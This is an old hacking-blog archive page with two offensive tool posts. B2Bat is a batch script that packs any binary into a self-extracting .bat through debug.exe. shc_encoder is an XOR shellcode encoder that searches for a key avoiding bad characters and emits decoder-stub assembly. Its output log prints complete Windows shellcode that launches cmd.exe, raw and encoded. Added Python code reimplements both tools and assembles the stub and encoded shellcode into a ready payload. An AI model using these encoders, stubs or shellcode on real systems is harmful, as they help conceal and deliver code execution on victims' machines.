Archive for the Herramientas (Tools) category

B2Bat (converts any file into a .bat)

Posted in Herramientas on September 12, 2009 by lShadowl
Code:
:: B2bat (binary to bat)
:: Author: lShadowl;The Shadow
:: Release date:24/8/09
:: Release version:1.0
:: Tested in Win Xp pro sp3
:: File size limit: 64kB (the size is taken from debug's 16-bit CX register)
:: Requires debug.exe, which only ships with 32-bit Windows.
:: Info: Converts any file into a batch script.
:: Syntax: b2b <in file> <out script>

       @echo off
:b2b
setlocal enabledelayedexpansion&& set ms=%2&& set mos=%1
if not defined ms (echo Syntax: b2b ^<in file^> ^<out script^>&& goto:eof) else (echo.Working...)
:: Build a debug command file ($) that shows CX (the size of the loaded file) and quits.
echo.exit|cmd/K prompt $_rcx$_$_q>$
:: debug prints "CX nnnn"; feeding that line to CX.bat turns it into set cx=nnnn.
echo set cx=%%1>CX.bat
debug %1<$ | find "CX">_.bat&& call _
:: Last address to dump: the file is loaded at 0100h and "d start end" is inclusive, hence the -1.
set/a ecx=0x100+0x%cx%-1
:: Convert ecx to the hex string sz, one nibble per iteration.
set hexstr=0123456789ABCDEF&& set sz=
:loop2
set/a ths=%ecx% %% 16
call :evals %%hexstr:~%ths%,1%%
if /I %ecx% GEQ 16 (set /A ecx=%ecx%/16&& goto:loop2) else (goto:kg)
:evals
set sz=%1%sz%&& goto:eof
:kg
:: Dump 0100h..sz with debug; rp.vbs then strips the redirection and pipe symbols that would break the echo lines.
echo.exit|cmd/K prompt $_d 100 %sz%$_q>$
type $ | debug %1>$.t
(echo set ff=createobject("scripting.filesystemobject"^)&& echo set rr=ff.opentextfile("$.t",1^)&& echo aa = rr.readall
echo rr.close&& echo r1 = Replace(aa,">",""^)&& echo r2 = Replace(r1,"<",""^)&& echo r3 = Replace(r2,"&",""^)
echo r4 = Replace(r3,"|",""^)&& echo set bb=ff.opentextfile("$.t",2^)&& echo bb.write r4)>rp.vbs&& rp.vbs
:: Replace the hyphen debug puts between the 8th and 9th byte with a space and append the rows to $.
for /f "tokens=1,* delims=]" %%A in ('"type $.t|find /n /v """') do (set "current=%%B"

    if defined current (call set current=!!current:-= !!&& echo !current!>>$) else echo.>>$)
:: Header of the output script; "n" names the file debug will write (truncated to 8.3, so b2bat.exi).
echo.exit|cmd/K prompt $_::Script by B2bat - B2bat by lShadowl$_       @echo off$_($_echo n b2bat.>%ms%
:: One "e" (enter) line per dump row: characters 5..57 are the offset and the 16 hex bytes.
for /f "tokens=* skip=7 delims=%%a" %%a in ($) do (set csl=%%a&& echo echo e!csl:~5,53!>>%ms%)
:brk
:: rcx must be the original size (cx), not the last address; "w" then writes that many bytes from 0100h.
echo exit|cmd/K prompt $_echo.$_echo rcx$_echo %cx%$_echo w$_echo q$_echo.$_)$Gda.t$A$A rem >>%ms%
echo.exit|cmd/K prompt $_debug$Lda.t$Gnul$_ren b2bat.exi %mos%$A$A rem >>%ms%
del $ $.t CX.bat _.bat rp.vbs 2>nul
echo.Done.
goto:eof

Example:

>b2b tongue.gif tongue.bat

Result:

Code:
::Script by B2bat - B2bat by lShadowl
       @echo off
(
echo n b2bat.exit
echo e0100  47 49 46 38 39 61 0F 00 0F 00 D5 00 00 00 00 00
echo e0110  CC 99 00 70 66 00 52 42 00 66 66 66 EE E1 00 EC
echo e0120  D1 00 E8 BA 00 B0 69 00 23 1C 00 D6 9C 00 FF 00
echo e0130  00 86 86 86 BF A6 00 68 54 00 11 00 00 FF D6 00
echo e0140  FF FF 00 FF F8 00 32 28 00 FF E6 00 C5 9E 00 73
echo e0150  5C 00 11 10 00 26 23 00 7F 71 00 81 37 00 F0 B5
echo e0160  00 F5 C4 00 3C 00 00 CC A3 00 51 48 00 FF CC 00
echo e0170  FF F0 00 7E 6A 00 C1 74 00 E2 C8 00 C7 B3 00 FF
echo e0180  DD 00 62 5A 00 D0 B4 00 80 73 00 59 47 00 1B 16
echo e0190  00 33 33 00 EC BD 00 80 69 00 08 00 00 18 00 00
echo e01A0  7F 7C 00 56 51 00 6D 57 00 CC 99 00 E0 9E 00 79
echo e01B0  61 00 F8 CE 00 99 99 99 00 00 00 00 00 00 00 00
echo e01C0  00 00 00 00 00 00 00 00 00 00 00 00 00 21 F9 04
echo e01D0  05 14 00 38 00 2C 00 00 00 00 0F 00 0F 00 00 06
echo e01E0  A3 40 9C 10 47 18 5C 00 97 0F 61 38 64 4C 56 22
echo e01F0  94 A1 24 C0 B0 18 CD 8B E3 66 32 51 42 A1 C2 E9
echo e0200  82 C5 4D 2C 20 88 F7 2B 69 CB 58 C4 04 27 BD 6E
echo e0210  47 24 85 4B D1 06 02 89 00 19 21 29 00 31 12 21
echo e0220  27 1F 17 1E 7D 00 8D 14 8D 00 60 25 47 73 20 2E
echo e0230  00 22 14 83 29 14 14 24 48 8B 7D 10 10 01 26 01
echo e0240  0A 14 26 0D 17 03 68 20 8D 0F 00 2F 00 08 5D 32
echo e0250  03 04 72 7D 20 23 0F 0B 1D 1A 10 2D 7A 66 0E 95
echo e0260  1B 0F 30 00 23 20 2A 13 42 0C AC BB 35 23 35 07
echo e0270  2A 64 4D 13 17 33 15 2D 01 33 2B 13 65 4C 45 47
echo e0280  AC 4B 43 41 00 3B 85
echo et

echo.
echo rcx
echo 286
echo w
echo q
echo.
)>da.t&& rem exit

debug<da.t>nul
ren b2bat.exi tongue.gif&& rem exit
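The conversion and its inverse, as an added Python example (this is not code from the original post): `to_debug_script` emits the same debug command lines that B2bat wraps in `echo` (one `e` line per 16 bytes, then `rcx`, the length, `w`, `q`), `to_bat` lays them out like the result above, and `extract_from_bat` rebuilds the embedded file from such a script without running it, which is how you would pull the payload out of a dropper of this shape for analysis. Note that the run above sets `rcx` to 286, the end address of the dump (0x100 plus the 0x186 = 390 bytes of tongue.gif), not the byte count, so debug would write 646 bytes; the `e` lines also carry one byte past the end (the 0280 row has 7 bytes) because debug's `d start end` is inclusive. The extractor therefore rebuilds the data from the `e` lines and only reports whether the declared length agrees. The function names, the 0xFF00 size limit and the sample bytes are this example's assumptions.

```python
import re

LOAD_ADDR = 0x100                 # debug.exe loads a file at CS:0100
MAX_SIZE = 0x10000 - LOAD_ADDR    # assumption: one 64 KiB segment minus the load offset


def to_debug_script(data: bytes, name: str = "b2bat.exi") -> str:
    """Emit the debug.exe command lines that B2bat wraps in echo lines."""
    if len(data) > MAX_SIZE:
        raise ValueError("too large for a single debug segment (%d bytes max)" % MAX_SIZE)
    lines = ["n " + name]                         # name of the file "w" will create
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        lines.append("e%04X  %s" % (LOAD_ADDR + off, " ".join("%02X" % b for b in chunk)))
    # rcx must be the byte count: "w" writes CX bytes starting at 0100h.
    lines += ["rcx", "%X" % len(data), "w", "q"]
    return "\n".join(lines) + "\n"


def to_bat(data: bytes, out_name: str) -> str:
    """Wrap the debug script in a batch file laid out like B2bat's output."""
    body = "\n".join("echo " + l for l in to_debug_script(data).splitlines())
    return "@echo off\n(\n%s\n)>da.t\ndebug<da.t>nul\nren b2bat.exi %s\n" % (body, out_name)


# One "echo e<offset> <hex bytes>" row; debug's "-" separator is already a space in B2bat output.
E_LINE = re.compile(r"^\s*echo\s+e([0-9A-Fa-f]{4})((?:\s+[0-9A-Fa-f]{2})+)\s*$")


def extract_from_bat(text: str):
    """Rebuild the embedded file from the 'e' rows of a B2bat-style script without running it.
    Returns (data, declared): declared is the value the script feeds to rcx, or None."""
    mem = {}
    declared = None
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = E_LINE.match(line)
        if m:
            addr = int(m.group(1), 16)
            for j, h in enumerate(m.group(2).split()):
                mem[addr + j] = int(h, 16)
        elif line.strip().lower() == "echo rcx" and i + 1 < len(lines):
            nxt = lines[i + 1].split()
            if len(nxt) == 2 and nxt[0].lower() == "echo":
                declared = int(nxt[1], 16)
    if not mem:
        return b"", declared
    lo, hi = min(mem), max(mem)
    data = bytes(mem.get(a, 0) for a in range(lo, hi + 1))   # gaps (none in B2bat output) read as 00
    return data, declared


def check_bat(text: str):
    """(data, declared, consistent): consistent is False when rcx disagrees with the e rows."""
    data, declared = extract_from_bat(text)
    return data, declared, declared == len(data)


if __name__ == "__main__":
    sample = b"GIF89a" + bytes(range(64))          # constructed sample, not a real image
    bat = to_bat(sample, "sample.gif")
    print(bat)
    print(check_bat(bat)[1:])
```

Run the extractor over a suspicious .bat before anything else: a script whose declared `rcx` does not match its `e` rows, as in the run above, still "works" for formats that tolerate trailing garbage (GIF viewers stop at the 0x3B trailer), so the mismatch is a tell rather than a defect that stops the dropper.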

Cheers!

shc_encoder (shellcode encoder)

Posted in Herramientas on September 12, 2009 by lShadowl
Code:
:: shc_encoder (shellcode encoder)
:: Author: lShadowl; The Shadow
:: Date: 07/08/09
:: Features:
::	-Uses XOR to encode the shellcode.
:: 	-Provides the source (in asm) to build the matching decoder routine.
::	-Detects null bytes and line breaks in the encoded result.
::	-Changes the XOR key if needed so that no null bytes or line breaks remain.
:: Limitations:
::	-Maximum input shellcode size: 61423 bytes
::	-Input shellcode format (a single line): \x<byte in hex>. Example: \xc7\xe2\xf0\x52
@echo off
setlocal enabledelayedexpansion
if '%1==' (goto:err)
:: The shellcode must be the first (and only) line of the input file.
if exist %1 (for /f "delims=" %%a in (%1) do set shellcode=%%a) else (goto:err)
echo =Original shellcode: %shellcode%
:: xor_value is incremented as a decimal number but read back as hex (0x followed by its digits),
:: so the keys tried are 0x10, 0x11 ... 0x19, 0x20 ...; encoder and stub agree because both read it as hex.
set hexstr=0123456789abcdef&& set xor_value=9

:encode
set sc_sz=0&& set i=2&& set/a xor_value+=0x01&& set encoded_shellcode=
echo =^>  Encoding opcodes (xor 0x%xor_value%)...
:encode_loop
set current_byte=!shellcode:~%i%,2!&& set encodedbyte_hex=
if %current_byte%'==' (goto:test)
set/a encoded_byte=0x%current_byte%^^0x%xor_value%
call:d2h %encoded_byte%
:: Pad to two hex digits by length. A numeric "lss 10" test here misses the single-digit
:: values a..f and emits e.g. \xd instead of \x0d.
if "%hex:~1%"=="" set hex=0%hex%
set encoded_shellcode=%encoded_shellcode%\x%hex:~-2%
set/a i+=4&& goto:encode_loop

:test
echo =Encoded shellcode: %encoded_shellcode%
echo =^>  Writing encoded shellcode to sc.shellcode...
echo %encoded_shellcode%>sc.shellcode
echo =^>  Searching for null bytes and line breaks in sc.shellcode...
:: Any hit goes back to :encode with the next key.
for %%a in (\x00 \x0d\x0a) do (type sc.shellcode|find "%%a">nul
	if !errorlevel!==0 (echo =^<    %%a found with: xor 0x%xor_value%
		goto:encode))

:len_loop
set var=!shellcode:~%sc_sz%,1!
if %var%'==' goto:build_decoder
set/a sc_sz+=1
goto:len_loop

:build_decoder
echo =^>  Creating decoder stub source...
:: Four characters (\xNN) per byte. 0x1010 is added so that "mov cx, length" carries no
:: null byte and the stub subtracts it again. Lengths whose low byte is 0xf0 still produce a 00.
set/a sc_sz/=4
set/a sc_sz+=0x1010
call:d2h %sc_sz%
echo ****************%hex: =%%xor_value%_decoder.asm********
(echo [BITS 32]
echo global ini
echo ini:
echo 	jmp short sc_data
echo decode_routine:
echo   	pop ebx
echo 	xor ecx,ecx
echo 	mov cx, 0x%hex: =%
echo 	sub cx, 0x1010
echo decode_loop:
echo 	xor byte [ebx], 0x%xor_value%
echo 	inc ebx
echo 	loop decode_loop
echo 	jmp short shellcode
echo sc_data:
echo 	call decode_routine
echo shellcode:)>%hex: =%%xor_value%_decoder.asm
type %hex: =%%xor_value%_decoder.asm&& echo *****************************************
echo =Decoder source saved to %hex: =%%xor_value%_decoder.asm

echo.&& echo ^>Process finished^<

goto:eof
:err
echo Usage: shc_encoder.bat ^<shellcode file^>&& goto:eof

:: Decimal to hex: builds the string from the least significant nibble upward.
:d2h
set dec=%1&& set hex=
:loop
set/a ths=%dec% %% 16
call :evals %%hexstr:~%ths%,1%%
if /I %dec% GEQ 16 (set /A dec=%dec%/16) else (goto:EOF)
goto:loop
:evals
set hex=%1%hex: =%&& goto:EOF

The code is fairly readable thanks to its descriptive labels and the status messages it prints along the way.

Here is a capture of the script's output while running:

Quote:
=Original shellcode: \xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\xe9\x0e\x00\x00\x00\x68\x31\x8b\x6f\x87\xff\xd5\x68\xf0\xb5\xa2\x56\xff\xd5\xe8\xed\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x00
=>  Encoding opcodes (xor 0x10)...
=Encoded shellcode: \xec\xf8\x99\x10\x10\x10\x70\x99\xf5\x21\xc2\x74\x9b\x42\x20\x9b\x42\x1c\x9b\x42\x04\x9b\x62\x38\x1f\xa7\x5a\x36\x21\xef\x21\xd0\xbc\x2c\x71\x6c\x12\x3c\x30\xd1\xdf\x1d\x11\xd7\xf2\xe0\x42\x47\x9b\x42\x00\x9b\x52\x2c\x11\xc0\x9b\x50\x68\x95\xd0\x64\x5a\x11\xc0\x40\x9b\x58\x08\x9b\x48\x30\x11\xc3\xf3\x2c\x59\x9b\x24\x9b\x11\xc6\x21\xef\x21\xd0\xbc\xd1\xdf\x1d\x11\xd7\x28\xf0\x65\xe4\x13\x6d\xe8\x2b\x6d\x34\x65\xf2\x48\x9b\x48\x34\x11\xc3\x76\x9b\x1c\x5b\x9b\x48\xc\x11\xc3\x9b\x14\x9b\x11\xc0\x99\x54\x34\x34\x4b\x4b\x71\x49\x4a\x41\xef\xf0\x48\x4f\x4a\x9b\x02\xfb\x96\x4d\xf9\x1e\x10\x10\x10\x78\x21\x9b\x7f\x97\xef\xc5\x78\xe0\xa5\xb2\x46\xef\xc5\xf8\xfd\xef\xef\xef\x73\x7d\x74\x3e\x75\x68\x75\x30\x10
=>  Writing encoded shellcode to sc.shellcode...
=>  Searching for null bytes and line breaks in sc.shellcode...
=<    \x00 found with: xor 0x10
=>  Encoding opcodes (xor 0x11)...
=Encoded shellcode: \xed\xf9\x98\x11\x11\x11\x71\x98\xf4\x20\xc3\x75\x9a\x43\x21\x9a\x43\x1d\x9a\x43\x05\x9a\x63\x39\x1e\xa6\x5b\x37\x20\xee\x20\xd1\xbd\x2d\x70\x6d\x13\x3d\x31\xd0\xde\x1c\x10\xd6\xf3\xe1\x43\x46\x9a\x43\x01\x9a\x53\x2d\x10\xc1\x9a\x51\x69\x94\xd1\x65\x5b\x10\xc1\x41\x9a\x59\x09\x9a\x49\x31\x10\xc2\xf2\x2d\x58\x9a\x25\x9a\x10\xc7\x20\xee\x20\xd1\xbd\xd0\xde\x1c\x10\xd6\x29\xf1\x64\xe5\x12\x6c\xe9\x2a\x6c\x35\x64\xf3\x49\x9a\x49\x35\x10\xc2\x77\x9a\x1d\x5a\x9a\x49\xd\x10\xc2\x9a\x15\x9a\x10\xc1\x98\x55\x35\x35\x4a\x4a\x70\x48\x4b\x40\xee\xf1\x49\x4e\x4b\x9a\x03\xfa\x97\x4c\xf8\x1f\x11\x11\x11\x79\x20\x9a\x7e\x96\xee\xc4\x79\xe1\xa4\xb3\x47\xee\xc4\xf9\xfc\xee\xee\xee\x72\x7c\x75\x3f\x74\x69\x74\x31\x11
=>  Writing encoded shellcode to sc.shellcode...
=>  Searching for null bytes and line breaks in sc.shellcode...
=>  Creating decoder stub source...
****************10c111_decoder.asm********
[BITS 32]
global ini
ini:
	jmp short sc_data
decode_routine:
  	pop ebx
	xor ecx,ecx
	mov cx, 0x10c1
	sub cx, 0x1010
decode_loop:
	xor byte [ebx], 0x11
	inc ebx
	loop decode_loop
	jmp short shellcode
sc_data:
	call decode_routine
shellcode:
*****************************************
=Decoder source saved to 10c111_decoder.asm

>Process finished<
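The same encode, key search and decoder stub construction, as an added Python example that is not the author's code. It reads the `\xNN` form the script uses (and the single-digit `\xd` the run above emitted for bytes 0x0a..0x0f, visible in `\x49\xd\x10`, so that output can be read back), XOR-encodes with the first key from 0x10 upward for which neither the encoded bytes nor the stub contains a bad character, and emits the decoder from the listing above assembled by hand. It goes beyond the page in two ways: the bad-character set is a parameter (a lone 0x0d counts as bad here, where the script only looked for `\x00` and a CRLF pair, which is why this example rejects key 0x11 on the same shellcode), and it refuses a length whose 0x1010-biased form would put a null byte into `mov cx`. `simulate_decoder` reads the key and length back out of the stub's own immediates and undoes the XOR, which checks the stub's fields without executing it. The function names, the 27-byte stub layout and its opcode bytes are this example's assumptions (compare against NASM output before relying on them); the shellcode constant is the one from the run above.

```python
BAD = frozenset({0x00, 0x0a, 0x0d})   # default bad characters; the page's script only checked \x00 and CRLF


def parse_escapes(s: str) -> bytes:
    """Read the \\xNN form the page uses. A single hex digit (the \\xd the original script
    produced for 0x0a..0x0f) is accepted too, so its own output can be fed back in."""
    parts = s.strip().split("\\x")
    if parts[0] != "" or len(parts) < 2:
        raise ValueError("expected a string of \\xNN escapes")
    return bytes(int(p, 16) for p in parts[1:])


def to_escapes(b: bytes) -> str:
    return "".join("\\x%02x" % x for x in b)


def xor_encode(sc: bytes, key: int) -> bytes:
    return bytes(x ^ key for x in sc)


def biased_length_ok(length: int) -> bool:
    """The stub carries length + 0x1010 in 'mov cx, imm16'; reject it if either byte is 00."""
    biased = length + 0x1010
    return biased <= 0xFFFF and (biased & 0xFF) != 0 and (biased >> 8) != 0


def decoder_stub(length: int, key: int) -> bytes:
    """The page's decoder, hand-assembled (assumption: these are the NASM encodings; 27 bytes).
    call/pop puts the address of the encoded bytes in ebx, cx counts them, the loop XORs in place."""
    if not biased_length_ok(length):
        raise ValueError("length + 0x1010 contains a null byte; pad the shellcode by one byte")
    biased = length + 0x1010
    return bytes([
        0xEB, 0x14,                               # jmp short sc_data (+20)
        0x5B,                                     # decode_routine: pop ebx
        0x31, 0xC9,                               # xor ecx, ecx
        0x66, 0xB9, biased & 0xFF, biased >> 8,   # mov cx, biased
        0x66, 0x81, 0xE9, 0x10, 0x10,             # sub cx, 0x1010
        0x80, 0x33, key,                          # decode_loop: xor byte [ebx], key
        0x43,                                     # inc ebx
        0xE2, 0xFA,                               # loop decode_loop (-6)
        0xEB, 0x05,                               # jmp short shellcode (over the call)
        0xE8, 0xE7, 0xFF, 0xFF, 0xFF,             # sc_data: call decode_routine (-25)
    ])


STUB_LEN = 27
KEY_OFF, LEN_OFF = 16, 7          # offsets of the key byte and the imm16 of "mov cx" inside the stub


def build_payload(sc: bytes, bad=BAD, first_key: int = 0x10):
    """Encode with the first key >= first_key for which neither the encoded bytes nor the
    stub contains a bad character. Returns (key, stub + encoded)."""
    for key in range(first_key, 0x100):
        enc = xor_encode(sc, key)
        stub = decoder_stub(len(sc), key)
        if not (bad & set(enc)) and not (bad & set(stub)):
            return key, stub + enc
    raise ValueError("no single-byte XOR key avoids the bad characters")


def simulate_decoder(payload: bytes) -> bytes:
    """Do what the stub does, using the key and length stored in its own immediates."""
    length = (payload[LEN_OFF] | payload[LEN_OFF + 1] << 8) - 0x1010
    key = payload[KEY_OFF]
    return xor_encode(payload[STUB_LEN:STUB_LEN + length], key)


# The shellcode from the run quoted above (177 bytes, ending in the string "cmd.exe ").
SC = parse_escapes(
    r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31"
    r"\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74"
    r"\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38"
    r"\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    r"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\xe9\x0e\x00\x00\x00\x68\x31\x8b\x6f\x87\xff"
    r"\xd5\x68\xf0\xb5\xa2\x56\xff\xd5\xe8\xed\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x00"
)

if __name__ == "__main__":
    key, payload = build_payload(SC)
    print("key 0x%02x, payload %d bytes" % (key, len(payload)))
    print(to_escapes(payload))
```

Two things the stub relies on that the page leaves implicit: the bytes must sit in writable memory (the loop patches them in place, so a read-only .text section will fault), and `loop` uses the full ecx, which is why the stub zeroes it before loading cx.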

Cheers!